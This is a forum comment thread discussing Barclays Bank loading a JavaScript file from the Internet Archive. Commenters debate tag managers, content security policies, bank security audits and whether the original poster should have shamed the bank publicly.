Content editors should not be able to add arbitrary code to a bank's website unless it undergoes review from someone who understands web security. If there is some kind of content editing tool, it should only allow content (not arbitrary scripts) to be edited.
Until about a year ago I was working as a FE developer for a major intenrnational bank.
All the processes and knowledge were in place to make sure all considerations were taken with our software with regards to security. But... all that good work and intention goes out the window when the marketing and analysis teams could pretty much, on a whim dump any old JS onto a production page via GTM. During my 18 months there, there were numerous issues (thankfully not security issues - at least that we know of) indroduced via this method inc a full outage of the customer onboarding journey.
I see GTM being used (abused?) by marketing teams regularly, but I'm really surprised that a bank with its own development team would allow it.
It is really powerful and sometimes incredibly useful in some scenarios (e.g I once built a schema.org metadata system that scraped the pages on the fly for a site with a broken CMS). Simo Ahava does clever things with it.
But from what I can tell, it seems to be a way of avoiding communication between teams, or a political power grab inside bigger companies - a parallel CMS. And the silly bit is that it's normally not doing much more than could be achieved by copy and pasting a few lines of code into a template.
I was once investigating "partner reporting that our embed loads slowly". The investigation result was something like: their HTML injects JS, which injects another JS, which injects GTM, which injects an SDK, which injects the embed.
Of course it all loads only when the user does not have any adblocking or tracking protections enabled.
It's a Google backdoor for your team to add more tracking etc.
The important point is that it's a backdoor for marketing (and adtech) teams to get around developer/security requirements. At some point, someone on those teams gets frustrated that their one-line code requests (just load this script! add a gif banner here!) keep falling behind in the backlog. That happens in part because the product team often doesn't care about marketing, and sometimes because developers know that "just one more script!" paves the road to hell. At some point the third-party that's trying to get their business going through your business convinces the marketing team to add GTM, the marketing team says to the dev team "Hey we need GTM to implement THIS script". This time, because the other side has promised them $$$ in terms ROI, the marketing team pushes really hard for it, and eventually a product manager approves the request to get them off their back. The rest, as they say, is history (at retro time, multiple times down the road).
Well the clue's in the name. But I'd argue that Google analysing metadata about who's loading what/when through GTM is a lesser evil, when compared to normalising everyone sticking megabytes of mystery scripts on their sites with the tool.
I'd say 'frontdoor' given that the standard first tag to implement is Google Analytics. But I am sure they also generate some data for their own use about the number and types of tags that each site is adding via GTM.
You can tell by the URL path (it's under /content/dam) that it's served by Adobe Experience Manager (Adobe's CMS, dam stands for digital asset manager, where you store static assets like images and js). The script itself is "target.js", which is Adobe Target - their A/B framework - which "supports custom code insertion"[1] similar to a tag manager.
It's not GTM, but this is like loading the GTM script itself from archive.org.
It's worth noting that AEM is often very badly set up, following requirements from managers who have no idea or concern about web development, and later maintained by low cost content editors who barely know some HTML. Moreover, this CMS seems to be a standard for big sites even though the licenses are costly, development is slow and complicated, and it adds a lot of human hours to the site maintenance.
> All the processes and knowledge were in place to make sure all considerations were taken with our software with regards to security. But... all that good work and intention goes out the window when the marketing and analysis teams could pretty much, on a whim dump any old JS onto a production page via GTM.
That's what's great about content security policies: put a CSP on the page, and when people try to add scripts without going through proper processes it just won't run.
Yes, but it won't allow GTM to load scripts off OTHER domains. It basically re-adds the requirement of engineering gating off 300 different adtech trackers.
I work for a large media comp and this is exactly the reason we don't give editors access to GTM (or even all developers), nor do we allow tools such as Optimizely intended for A/B testing, and we went away from letting them paste HTML into articles to include custom elements.
Unfortunately, we still have lots of 3rd party stuff in GTM, and technically any ad can run random js on our sites. Thats where most problems come from these days.
Editors still technically have the power to brick a given site through our old inhouse CMS which has no proper access control levels, hopefully not for long...
> technically any ad can run random js on our sites
If you configure your ad network to run all ads cross-domain, then they are very limited. For example, in GPT (which I work on) you call "googletag.pubads().setForceSafeFrame(true)".
"customer onboarding journey" sounds altogether twee for a major international bank. Banks are mattresses with insurance policies. Why is there even a journey to be broken?
Because they have to know who you are in a fair bit of detail both to comply with the law and to know who they should let take money out of the account. Because they need you to agree to a bunch of contacts. Because they need to get you things like a bank card. Because they need to decide if they want to lend you money (most often in the form of a credit card). And so on and so forth.
Fun story: I had a Barclaycard once. I chose to get bills/invoices via snail mail because I'm old fashioned. Didn't use the card for almost a year after signing up and then finally bought something online with it. Got an invoice next month and paid it. Then got another invoice the next month over 60ct for the invoice sent via snail mail. Fair enough, they stated that when I signed up. But then I got another bulk the following month because, you guessed it, the invoice for the invoice was sent via mail. I tried to be clever then and paid 1.20€, but that doesn't work since I still got a letter saying there's still enough money in my account covering the invoice. So after four or five months I just gave up and canceled my account.
Adding scripts might be considered OK (content editors could be given light-weight developer tasks), but modifying the site's CSP definitely isn't. There aren't many things you can do to stop an attacker injecting code in to your site, but having a CSP that whitelists servers under your control and blocks everything else is something that you can implement. Changes to the CSP should not be done lightly.
The fact that the CSP is whitelisting archive.org makes this look like an attack to me, or at least a test run before a real attack. I don't believe this was a simple mistake.
I've audited e-banking websites before. Every file, every element needs to be accounted for. This is beyond "an honest mistake" and it should have been caught by any of the (many) scans the bank orders for its websites. And the scan/report should have caught that. Who does their scans/reports? What is the scope of these scans? Who reviews these reports?
This is not about content. Content is "make a new page with that template and add a photo and the new text about XYZ product". Not a new functionality/code.
I wonder who signed this off prior to.release and what does their wiki/Jira mentions.
Edit: e-banking and other banks websites/online presence(s).
Edit2/rant: I have been the go-to audit/sec/compliance guy for more than a decade. It amazes me in this forum that there are very few discussions/POVs on the audit/security element. In most cases (like this one), an experienced auditor would have picked this up in 20mins. If only Barclays (in this case) bothered to escape the fixed-10 years old checklist/audit program these would never have happened.
> This is beyond "an honest mistake" and it should have been caught by any of the (many) scans the bank orders for its websites. And the scan/report should have caught that. Who does their scans/reports? What is the scope of these scans? Who reviews these reports?
It is partially baffling at least. We had to do a standalone website ad campaign for a bank (same level/recognition as barclays) once, some kind of rewards program where all you could do was browse what was possible to redeem your points for. No accounts, no cart, no integration whatsoever, it was basically a static site (with some user interactivity). We'd get scanned constantly and were always made aware of mistakes or issues, one of them being 3rd party resources.
On the other hand, I wasn't too impressed with their security scanning. Two issues had come up that made me dubious of what all good this actually did.
First was some kind of ssh vulnerability. We were using an older (but still supported) amazon linux ami. The ssh was actually patched but the version did not match what they wanted in the security tool's version. We had to get them to talk with AWS to ensure it was an actual patched version of ssh and the security scanning tool just wasnt accepting it as valid.
The other was some kind of javascript vulnerability in a library. There was an open cve on the library, an open issue on github, with comments on how to fix it, but the library itself wasn't being updated. I manually patched it and named it version x.y.z-patched or something. Report comes back that its still a vulnerability. I'm like what? Impossible I just patched it and tested it myself. The CVE no longer works. So I just renamed it to x-patched.y.z and poof, we pass validation.
This was my version time with vulnerability testing and I was kinda let down by it. I assumed they had people (or tools) actually trying to exploit the site like how I tested the patch for the javascript library prevented the CVE from working instead of just looking for version numbers and comparing to a list of known issues.
I get what you are saying but I also think the parent has a point, if it was that easy to do an end run around the scanning (accidentally or otherwise) then it's not really suitable for auditing external parties. For your internal teams you can probably have some level of confidence they will fix it in good faith.
Scanning is useful to automate a "thing" but your audit is multifaceted and should probably require peer review (pull/merge requests).
In simple terms, scanning should _hopefully_ help a dev who wants to do the right thing, but it won't help a malicious dev, so you're gonna need something else.
Peer review, least privileged access, protective monitoring, etc.
When I was coming up as a CMS operator there were a lot of jobs to undertake site updates for banks and law firms - the JDs were always caveated about needing to understand both regulatory as well as security issues.
I never applied as I like pushing the boundaries when it comes to using CMSs, but if they're calling it out from Day One it's also on the operator to not do it even if they could.
> A technical solution could be to add a strict CSP policy but in general the problem is broader and applies to a lot of banks.
The Web is broken, and CORS/CSP headers will only be able to fix only some individual cases, of a bigger, currently unfixable design problem.
The tons of random JS APIs brought into the browser without a any real critical review are making the initial design of scripts on the web being inherently secure, to them not being so.
The state of things needs to be brought back to the point where arbitrary JS simply cannot mess up your browser by design, and when you can load resources from everywhere safely regardless of tricky settings of now 10+ CSP related headers.
Or alternatively, there needs to be a solution to completely shut down those APIs, any "advanced" functionality to load 3rd party resources, reinforced by cryptohashes, and signature checks to verify loaded resources.
Imagine a situation where somebody manages to inject own script into bank's page not through employee's negligence, but through some exploit.
You would still have an issue where there is simply no functionality to killswitch all those novel APIs of arguable safety, and tell the browser to shut down any script not explicitly listed as allowed on the site.
CSP has been an inconsistent, ever growing standard, with a history of implementation breakages. I think only CSP 3.0, and a long WIP safe types standard have approached the level of being actually useful.
I saw websites with a screen long CSP header to work around standard's inconsistencies like frame-src/child-src, and form redirects. I think it's only a matter of time when somebody will find a chink in that weak armour.
The lack of sane by-default policy makes you vulnerable the moment attacker finds a way to redirect a browser to a non-CSP protected page on your domain. Mitigations exist, but... many buts.
Reflection attacks, when attacker injects your own hashed scripts, and data exfiltrating css on pages where they shouldn't be are still possible in various scenarios unless you inline all scripts, and set CSP per every URL.
Other data exfiltration sources, and injection sinks keep being found few times a year.
Hard disagree. WASM is as good an opportunity as any to enforce better security habits, and indeed seems to be designed specifically with browser security/sandboxing in mind. "Killing" WASM does precisely nothing to fix the status quo around JS insecurity.
It's kind of bizarre how many people are out to defend Barclays here. Normally HN is the first to criticize websites for bad Javascript, ugly fonts, scrolljacking, etc.
It's not the TSB IT fiasco but it's still an error on their part.
If people are cutting Barclays slack, perhaps it's because the guy on Twitter is painting this as a satanically evil deed when it was probably just someone making a stupid mistake.
Additionally, the aggregate bandwidth cost of delivering that JS file during its lifetime is probably less than $0.05. How many copies of this file would need to be concatenated to equal the size of David After Dentist?
No one levels up on the Internet — and especially Twitter — by being calm and reasonable.
I looked at the Tweet (you know, it's also the article title) and it does no such thing - even referring to this as the Internet Archive CDN.
This is entirely a strawman you are burning down to make light of the fact that far from a stupid mistake, this is recklessness enabled by the joke of an "web development" industry. This stupidity is common practice and certainly no one in this thread seems even slightly inclined to clean it up.
Well, as a guesture it would be nice if they could just add some money for the lawsuits against the archive. Aside from being an unwilling CDN, it has quite some other perks.
Internet Archive as version control, I love it. There's some good comments in there, one guy determined it had been like this for a month, yikes. Peer review anybody? Or maybe they only have one web dev and he's a junior so the seniors dont inspect it as harshly.
It is extremely concerning, because it indicates how quality control is abandoned in search for every lower costs.
Embarassing if one considers that most of these issues should be caught by automation before code review even happens.
Such a symptom indicates extremely sloppy development process, and low security culture.
It would be interesting to use such fragmentary news to correct stock pricing, with respect to current management and processes.
This reminds me of the time I caught my mortgage lender using javascript loaded directly from a github repo on their mortgage application process. I reported it to them and they didn't understand the problem.
that's pretty funny but what is the problem with that? direct link, possibility of updating, same possibility of 404 as anything else, CDN and caching included
If it’s straight up linking a non-versioned file (e.g. live file) it implies the owner of that Github repo has direct access to update and run code in client’s browsers. Could start shooting off API requests dumping the contents of cookies/localStorage, set up keylogging, etc. IMO seems like a pretty big security hole.
Anyone from BarclaysUK internal (IT) audit team reading this? I wonder what your scope is when you run audits on your webs...
Also.. that vulnerability scanner and pentester.. what kind of reports do they issue that they don't mention this JS source??
"Move Fast and Break Things" is not the motto you hope to see your bank adopting...
I had a problem with Natwest online banking where the "random" character entry was the same each time (first, second and third characters) - which reduces the security incredibly.
In a French bank 10 years ago, their e-banking system was recording the actual values you typed in, their order in your 6 digit PIN, and your username. The logs were dropped on a share drive so that backup can pick them up. The shared drive was read only to "Everyone".
IT fought hard and long on the risk of this whole 'setup'. They agreed when I reconstructed 5 PINs (I stopped at 5, point was made). CTO was cool about this, insisting "what are the odds of this happening?" COO & CEO had a totally different (more sensible) opinion.
The Internet Archive rewrites contents of scripts to inject the archive URLs. A better explanation than OP's clickbait is that someone went to the archive to copy/paste misplaced tracking code.
Ooh, this reminds me that I saw a file being included straight from github.com on flyporter.com (Canadian regional airline)
Actually, extremely weirdly, they didn't include the "actual" file (the raw version of it) but ... they included the github page in the <script> tag...??
Go through a checkout on flyporter.com (use dates > Aug 31st as they're resuming service then) and you'll see
in the source code which makes no sense (try that URL in your browser!)
I contacted everyone I could find on LinkedIn who's working as CTO/CIO/etc. there, AND emailed them but never heard back. (this was 9 months ago... the issue is still there)
Isn't this how the British Airways checkout ended up being hacked?
For sites with a large % of the same people coming back on a daily or weekly basis, there's probably not much to be gained by serving static files from a CDN.
While that's true in terms of root cause analysis, the browser doesn't see it that way - all content on barclays.co.uk is equally trusted by the browser, so every other team is impacted by this.
It's really annoying how people like him blow these things out of proportion to shame and extort companies.. Seems like he didn't even make a serious attempt to message them.
Have you ever tried to contact a big company for something small like that when you don't have a direct line for support? It's a complete waste of time. Shaming them publicly is the only way to do it without wasting your own time. If those companies don't want to get shamed publicly they can make an effort to provide a way for technical people to report minor issues IMO.
Why should he spend his time (=money) to chase down a multi-billion dollar company to get them to fix a stupid error when he'd be lucky to get a thank you email for the effort?
<Raises hand.> I have. Sometimes successfully, sometimes not.
Two successes:
- I'd determined that a large email provider was transiting a sizeable fraction of all 419 spam I was seeing (and knew that this was likely broadly representative). Looked up the product title with "project manager" and similar terms, called the corporate switchboard, and asked for them by name. Phone picked up on first ring, I explained the situation briefly, fifteen minutes later I received a call from the manager in charge of that area, who leptnin touch over the next three months as the issue was resolved.
- Another time worksite had issues with another email service provider with glacially slow processing of our notification emails. Performed an executive email carpet bomb[1] after months of ineffective helpdesk attemps, with evidence of the issue. Was assigned a minder who helped resolve the issue.
Both were large companies (at the time), one I'm distinctly not inclined to consider favourably. Both responded exceeding expectations.
An internet named 'weev' tried to do that when the iPad first came out. He found they had an open json endpoint for completing email addresses from the device IMEI. He ended up in prison for trying to publicly shame AT&T,
Twitter author here. I didn't make any assertions about the impact of this issue. A respondent to the Tweet said they found this earlier and had already disclosed it to Barclays. I also tried to contact them for another issue and spent over 6 hours on hold before giving up. It's really annoying how people love to moan on HN without context.
You did say "Not to mention the scumbaggery of leeching bandwidth from a not-for-profit", which is attributing poor motive and character. Even without that, your general tone is scathing and accusing, over something that is likely a simple mistake by a fairly fresh or unskilled developer.
How would this happen? I’m imagining someone wanting to roll back a change, going to Internet Archive for the last known good day, viewing the source and copy/pasting into their editor/CMS? Points for creativity at least.
>"that is likely a simple mistake by a fairly fresh or unskilled developer."
I'd assume that for banks all code that goes into production gets audited. More so it is easy to have the code run through some analyzers before submitting it to production where presence of external origin should be detected automatically and raise a flag.
If not it is gross negligence on the bank's side and deserves all the scathing and accusations it can get.
>>> I'd assume that for banks all code that goes into production gets audited.
Code would be reviewed by a developer, not audited. The reviewer may or may notice the dependency to archive.org and may or may not care.
Speaking from experience, the bank may have a policy to prohibit using external javascript, while the bank may not have a CDN itself to be able to host said dependencies.
I've worked in finance for the last 20 years. My code has never been audited and very rarely even peer reviewed. Then again, I work in back office and nothing web facing, so theres that.
When I was in high school in the 90s I did work at a bank after school. My job was to sort and file debit card applications. No one audited my work either. Part of my job when reviewing every card on file was to verify the balance on the account that backed the debit card. If the account balance was zero or less, I filled out a form to cancel the card to be faxed out in a batch. Typically had 20-50 cancellations per day in 3 hours of work. No one reviewed them before sent, the files were just filed away to be forgotten. Mind, this was a small rural bank, so that might have played into it.
"I'd assume that for banks all code that goes into production gets audited"
The point of tag managers is to let non-developers update production without going through a code deployment so the usual code review and oversight doesn't apply.
Also worth keeping in mind that this is the bank's marketing site. It's almost surely managed by a different team than the actual online banking site and probably has looser restrictions.
It screams virtue signalling to me. I'm not even sure where @BlackGirlsCode even comes into it apart from to announce to the world that the author cares about social justice issues.
You're doing some signaling of your own, intentional or not, when your only contribution to this thread has nothing to do with the overall topic and instead chose to make accusations without any information. I know you're capable of doing better than that.
"using as a CDN" implies a deliberate choice to me. Why not "because it was a convenient way for their developer to include it"? You don't know why. A lot of web developers don't know what CDNs are for too.
"because it was a convenient way for their developer to include it" implies it was a deliberate choice also, when there's no way in hell someone didn't do this as a mistake lol.
PLUS, "using as a CDN" is what the site was literally doing, from a functional standpoint. It was pulling that script from Internet Archive, using their upload bandwidth.
> "because it was a convenient way for their developer to include it" implies it was a deliberate choice also
I didn't word it well but that was my point. For the same reason, I wouldn't pick the "CDN" headline as it gives a possibly false narrative too.
> PLUS, "using as a CDN" is what the site was literally doing, from a functional standpoint. It was pulling that script from Internet Archive, using their upload bandwidth.
I'd be fine with "using their bandwidth". I don't see how the Internet Archive having a CDN or not is important to the story, and including this fact in the headline makes it sound important.
I don't think the author was implying that Barlcay Bank was intentionally using Internet Archive by using the term "CDN".
But, per your suggestion, if the title was something like "Barclays Bank using Internet Archive's bandwidth to load their JS assets" then it's essentially the same thing as saying they're using Internet Archive as a CDN.
A CDN is there to deliver asset files to websites, which is exactly what Internet Archive was doing for Barclay Bank in this case. The author used the term "CDN" to describe the situation or position Internet Archive was in relation to Barclay Bank.
Also using the term "CDN" would make it easier for people to understand what was happening just by reading the title.
>Why not "because it was a convenient way for their developer to include it"?
In the end, they would still be using IA as a CDN, no matter the verbiage. We can make a reasonable guess as to why, considering it's a really bad idea for many reasons; someone made a mistake. Intentional or not, it's a mistake all the same.
A technical solution could be to add a strict CSP policy but in general the problem is broader and applies to a lot of banks.
The real issue is that banks (and it's not specific to Barclays) are loading JavaScript code from third-parties.
The fact that it is InternetArchive (yet another Internet cache) is not more worrying than GoogleUserContent.com for example.
Otherwise, the "asking money for redemption/forgiveness" part to Barclays is a bit borderline in my opinion.